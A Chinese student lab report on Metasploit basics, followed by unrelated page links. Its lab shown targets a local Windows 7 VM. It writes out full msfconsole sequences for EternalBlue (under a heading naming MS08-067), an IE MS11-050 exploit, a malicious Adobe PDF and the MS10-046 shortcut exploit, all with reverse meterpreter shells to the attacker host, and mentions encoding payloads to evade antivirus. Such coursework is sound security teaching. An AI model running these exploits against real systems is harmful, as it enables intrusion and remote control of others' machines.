2018-2019 20165221 网络对抗 Exp5 MSF基础

实践内容:

  • 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1. 一个主动攻击实践,如ms08_067; (1分
    2. 一个针对浏览器的攻击,如ms11_050;(1分)
    3. 一个针对客户端的攻击,如Adobe;(1分)
    4. 成功应用任何一个辅助模块。(0.5分)

具体实验操作

  • 攻击机(kali):192.168.194.128
  • 靶机(win7):192.168.194.129

任务一:主动攻击实践

Windows服务渗透攻击——MS08-067安全漏洞

  • 在攻击机的kali中输入
msfconsole

依次输入以下指令:


msf > use exploit/windows/smb/ms17_010 eternablue
msf exploit(windows/smb/ms17_010_eternablue) > show payloads
msf exploit(windows/smb/ms17_010_eternablue) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(windows/smb/ms17_010_eternablue) > set LHOST 192.168.194.128 //攻击机ip
msf exploit(windows/smb/ms17_010_eternablue) > set LPORT 5221 //攻击端口
msf exploit(windows/smb/ms17_010_eternablue) > set RHOST 192.168.194.129 //靶机ip,特定漏洞端口已经固定
msf exploit(windows/smb/ms17_010_eternablue) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(windows/smb/ms17_010_eternablue) > exploit //攻击
  • 查询信息

  • 建立会话成功,成功结果如下

  • 设置监听信息



  • 渗透成功!

任务二:浏览器渗透攻击——MS11-050

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.194.128 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5221 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 2016tx //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit
  • 设置监听信息

  • 接着在win7靶机中打开浏览器,进入自己刚刚确定的网页 http://192.168.194.128:8080/2016tx



  • 查看自己刚刚生成的网页

  • 嗯.....直接被杀,连网页都无法打开,渗透攻击失败

任务三:针对客户端的攻击

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.194.128 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5303 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 20165221.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击
  • 生成PDF文件20165221.pdf



  • 将生成的PDF文件拷贝到靶机win7中。

  • 在攻击机(kali)中设置监听模块

    msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.194.128 //攻击机ip
msf exploit(handler) > set LPORT 5221 //攻击端口固定
msf exploit(handler) > exploit
  • 设置监听模块

  • 在win7的靶机中打开20165221.pdf
  • 在攻击机中进行攻击,即可获得win7机的权限

任务四:针对快捷方式图表漏洞的攻击

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.194.128 //攻击机ip
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.194.128 //攻击机ip
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻击
  • 进入控制台输入指令



  • 在win7靶机上浏览刚刚在kali中得到的网页http://192.168.194.128,并在弹出的安全框中选择允许

  • 接着会进入一个文件夹,点开里面的快捷方式

  • 然后返回攻击机(kali)界面,会发现攻击机正在悄悄地连接靶机,试图建立会话



  • 尝试输入shell,即可渗透成功

  • 而且即便靶机关闭网页,攻击机仍可控制并继续攻击靶机

辅助模块

  • ipidseq:扫描网段中的存活ip,识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
  • 输入show auxiliary查看所有辅助模块,并输入use scanner/ip/ipidseq选择攻击模块

  • 输入show options指令查看相关信息

  • 设置监听信息,进行攻击!

基础知识问答:

用自己的话解释以下三个概念

  • exploit : 字面意思为开发开拓,为自己谋得利益,我理解的应该是利用一切因有的手段,获得管理员权限,从而控制整个网站,具体到MSF中,就是负责将降攻击的代码送到靶机中,达到自己的目的。
  • payload :是一段代码,用于渗透之后在目标主机上执行,是实现病毒有害功能的部分
  • encode :其本意为代码,在这里应该是用来对payload进行编码,主要是为了避免坏字符和实现免杀的功能。

实验总结

  可能是自己这几次上课都认真听讲了还是怎么回事儿,这次的实验做的比较顺利,遇到的主要问题还是虚拟机,这周又崩溃了一次,还好我的vmware的安装包没有删,重新又装了一遍,嘻嘻嘻。而且自己的这次渗透攻击也并不是全都能成功。而最后的图标攻击渗透,是引诱靶机登录攻击机设置好的网站,最可怕的是,即使靶机后来关闭了该网站,攻击机仍然可以继续控制靶机。

离实战还缺些什么技术或步骤?

  • 我觉得还差得挺远的吧,毕竟有些漏洞已经被修复了,这次实验的难度主要在寻找到合适的模块,进行攻击,做黑客攻击还是挺不容易的......还有就是对指令不太熟悉吧。

2018-2019 20165221 网络对抗 Exp5 MSF基础的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  3. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  4. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  5. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  6. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  7. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

  8. 20155218《网络对抗》MSF基础应用

    20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

  9. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

  1. An interesting combinational problem

    A question of details in the solution at the end of this post of the question is asked by me at MSE. ...

  2. jquery获取元素节点

    常用到的知识点,在此记录,以便查阅 $('.test').parent();//父节点 $('.test').parents();//全部父节点 $('.test').parents('.test1' ...

  3. iview table内渲染proptip组件

    渲染proptip组件 columns: [{ title: '产品图', key: 'pic', sortable: true, render: function(h, para){ return ...

  4. [转]html5监听任何App自带返回键javascript事件

    1.前言 如今h5新特性.新标签.新规范等有很多,而且正在不断完善中,各大浏览器商对它们的支持,也是相当给力.作为前端程序员,我觉得我们还是有必要积极关注并勇敢地加以实践.接下来我将和各位分享一个特别 ...

  5. MonkeyRunner 综合实践

    综合实践 测试场景 连接设备,自动安装并启动考研帮app 启动后登录账号(账号zxw1234 密码:zxw123456),然后截图并保存到指定文件位置. 思路分析 连接设备 安装app 启动app 输 ...

  6. spring cloud配置注册中心显示服务的ip地址和端口

    1.在springcloud中服务的 Instance ID 默认值是: ${spring.cloud.client.hostname}:${spring.application.name}:${sp ...

  7. 从输入URL到页面加载的全过程

    前面的话 本文将详细介绍从输入URL到页面加载的全过程 概述 从输入URL到页面加载的主干流程如下: 1.浏览器构建HTTP Request请求 2.网络传输 3.服务器构建HTTP Response ...

  8. 【MyBatis】Mapper XML 文件

    Mapper XML文件 MyBatis 的真正强大在于它的映射语句,也是它的魔力所在.由于它的异常强大,映射器的 XML 文件就显得相对简单.如果拿它跟具有相同功能的 JDBC 代码进行对比,你会立 ...

  9. JS在一个数组中查找某个用户输入的值,返回对应值所在索引值

    方法有很多种 第一:直接循环,判断输出 第二:使用indexOf 正常来说,为了增加工作效率一般会选择indexOf,但是indexOf存在兼容性问题,因此最完善的写法如下 function inde ...

  10. crontab语法

    *           *        *        *        *           command minute   hour    day   month   week       ...